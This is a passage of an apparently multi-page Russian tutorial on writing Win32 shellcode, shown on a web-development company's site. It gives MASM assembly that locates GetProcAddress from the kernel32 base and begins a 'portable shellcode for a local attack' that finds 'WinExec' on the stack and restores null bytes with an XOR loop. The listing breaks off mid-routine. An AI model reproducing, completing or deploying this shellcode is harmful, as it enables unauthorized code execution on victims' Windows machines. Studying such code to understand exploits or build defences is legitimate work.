Разработка динамических сайтов
SEO услуги
Управление контекстной рекламой

Вход на хостинг

Имя пользователя:*

Пароль пользователя:*

IT-новости

20.04.2016 iPhone 2017 года поместят в водонепроницаемый корпус из стекла

Линейка iPhone в новом году серьезно поменяется. В этом уверен аналитический исследователь Мин Чи Ку......

подробнее

30.07.2015 Ищем уникальный контент для сайта

Ищем уникальный контент для сайта Без уникального контента Ваш сайт обречен на то, что его страницы......

подробнее

11.05.2015 Распространённые ошибки разработчиков сайтов

Не секрет, что в сети Интернет насчитывается миллионы сайтов, и каждый день появляются тысячси новых......

подробнее

           lodsd                             ; Прочитаем

           add    eax,edx                    ; Добавим адрес kernel

В начале этого кода в edx хранится адрес kernel, а в конце в eax хранится адрес функции GetProcAddress.

Третье и четвёртое требования выполняются достаточно легко. Для этого необходимо знание о том, с какими параметрами запускаются необходимые нам WIN API-функции.

Теперь построим переносимый shell-код для локальной атаки на Win32-системы:

.386                           

.model flat, stdcall           

extrn ExitProcess:proc                                      

.data                         

start:                         

;---------------[SUPA SHELLCODE]--------------------------

Getproc:

           mov    esi,esp                    ; esi указывает на вершину стека

           xor    ecx,ecx                    ; обнуляем ecx

           mov    cl,169                     ; ecx указывает на текстовую строку 'WinExec'

           add    esi,ecx                    ; И esi теперь указывет на 'WinExec'

           push   esi                        ; Кладём esi в стек

           mov    ebp,esi                    ; И ebp теперь указывает на 'WinExec'

           mov    edi,esi                    ; И edi теперь указывает на 'WinExec'

           xor    ecx,ecx                    ; Обнуляем ecx

           mov    cl,27                      ; И кладём в cl 27

xor1:      lodsb                             ; Загружаем в al байт

           cmp    al,01                      ; Проверяем 1 это или нет

           jne     nextb                     ; Если нет – ищем дальше

           xor    al,01                      ; Если 1, то обнуляем его и

nextb:

           stosb                             ; Возвращаем на место

           loop   xor1                      ; Таким образом, мы восстанавливаем все нужные нам нули

           xor    ebx,ebx                    ; Обнуляем ebx

 


Предыдущая страницаОглавлениеСледующая страница
 
[001] [002] [003] [004] [005] [006] [007] [008] [009] [010] [011] [012] [013] [014] [015] [016] [017] [018] [019] [020]
[021] [022] [023] [024] [025] [026] [027] [028] [029] [030] [031] [032] [033] [034] [035] [036] [037] [038] [039] [040]
[041] [042] [043] [044] [045] [046] [047] [048] [049] [050] [051] [052] [053] [054] [055] [056] [057] [058] [059] [060]
[061] [062] [063] [064] [065] [066] [067] [068] [069] [070] [071] [072] [073] [074] [075] [076] [077] [078] [079] [080]
[081] [082] [083] [084] [085] [086] [087] [088] [089] [090] [091] [092] [093] [094] [095] [096] [097] [098] [099] [100]
[101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120]
[121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140]
[141] [142] [143] [144] [145] [146] [147] [148] [149] [150] [151] [152] [153]

+7 (831) 413-63-27
ООО Дельта-Технология ©2007 - 2023 год
Нижний Новгород, ул. Дальняя, 17А.
Rambler's Top100